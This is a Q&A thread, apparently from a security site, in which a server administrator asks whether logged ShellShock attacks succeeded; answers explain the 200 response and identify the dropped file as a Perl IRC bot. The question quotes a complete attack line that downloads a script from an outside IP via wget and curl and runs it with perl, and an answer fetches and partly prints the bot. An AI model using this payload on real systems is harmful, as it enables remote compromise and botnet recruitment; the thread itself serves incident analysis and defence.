2

Looking through my web server logs, I noticed two different ShellShock attacks on my server, both of which generated a HTTP 200 OK response code. They look like this (IP address/date and time redacted):

223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""

My bash version is 4.2.37 and we do regularly update this server through apt-get update && apt-get dist-upgrade along with daily log file analysis. Apache 2.2.22 is being used and only port 80 is open. The file downloaded appears to be a IRC script which I can only imagine is used for flooding purposes in this context.

Trying to run x='() { :;}; echo VULNERABLE' bash -c : (from Is there a short command to test if my server is secure against the shellshock bash bug?) returns nothing but running ps -p $$ from a SSH terminal shows a bash shell currently in use.

The question is that is it likely that the exploit worked given the above?

Ocracoke
  • 123
  • 4
  • 3
    What do you think that running `ps -p $$` is doing? As nearly as I can figure out it is telling `ps` to print information about the SSH shell that you are in. What has that to do with ShellShock? – Neil Smithline Jun 14 '15 at 02:15
  • You could run `who` for looking about user connected to your server. – F. Hauri - Give Up GitHub Jun 14 '15 at 07:15
  • ... Go to http://tldp.org/, in *Guides* index, search for *System Administrators*! Enjoy reading! – F. Hauri - Give Up GitHub Jun 14 '15 at 07:18
  • @NeilSmithline I wanted to prove that I was running a bash shell instance and was more puzzled over why running the `x='() { :;}; echo VULNERABLE' bash -c :` printed nothing. If it came back I was running sh or similar, then this question wouldn't have been raised. – Ocracoke Jun 14 '15 at 12:23

2 Answers2

2

There's no way to tell from the logfile alone. The "200 OK" response just means your webserver is running and has an index page at "/" -- something true of almost every webserver in the world.

If x='() { :;}; echo VULNERABLE' bash -c : doesn't print the word VULNERABLE, you almost certainly aren't vulnerable.

Mark
  • 34,513
  • 9
  • 86
  • 135
  • Careful here! Shellshock is not a vulnerability, it's a **collection of vulnerabilities**. You can be immune from one but not the next one. Also, many people consider that the fact `() { foo }` can define a function IS already a vulnerability, as the attacker doesn't need to control the variable name. – curiousguy Jun 14 '15 at 12:17
  • In addition the remote exploit required the use of the mod_fastcgi module be loaded within Apache as it was actively passing data through /bin/bash triggering allowing for an exploit to occur within the context of the running service, in this case apache. – jas- Jun 14 '15 at 17:17
1

This is an old perl irc bot:

... ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;c...

At time I write this, I already do the wget and some inspection:

cd /tmp
wget 85.214.60.234/den
sed -e 's/^\(.\{78\}\).*/\1/;12q' den
#!/usr/bin/perl

##############################################################################
##############################################################################
## JST Perl IrcBot v3.0 / 2011 by FrankBlack @ Millenium Group ## [ Help ] ###
##      Stealth MultiFunctional IrcBot writen in Perl          ###############
##        Teste on every system with PERL instlled             ##  !u @system 
##                                                             ##  !u @version
##     This is a free program used on your own risk.           ##  !u @channel
##        Created for educational purpose only.                ##  !u @flood  
## I'm not responsible for the illegal use of this program.    ##  !u @utils  
##############################################################################

Well this old script do some self hidding and a lot of things under remote control through external IRC server.

I already wrote a not perfect DDos Perl IrcBot Killer, which work perfectly with this version.

Have a look at line 61 and 62 of my script:

61          m+^(/usr)?(/local)?(/s?bin)?[\[/]?(http|ssh|apache|syslog|cron|klog|kblockd|khelper|kmpathd|ksoftirqd|acpi|sync|-)+;
62  #       m+^(/usr)?(/local)?(/s?bin)?[\[/]?([a-z0-9-]\+)+;

and lines 31 to 38 from den version:

31  my @rps = ("/usr/local/apache/bin/httpd -DSSL",
32                     "/usr/sbin/httpd -k start -DSSL",
33             "/usr/sbin/httpd",
34             "/usr/sbin/apache2 -k start",
35                 "/sbin/syslogd",
36                 "/sbin/klogd -c 1 -x -x",
37                     "/usr/sbin/acpid",
38                     "/usr/sbin/cron");

So I could ensure (today), my script will find and kill this virus.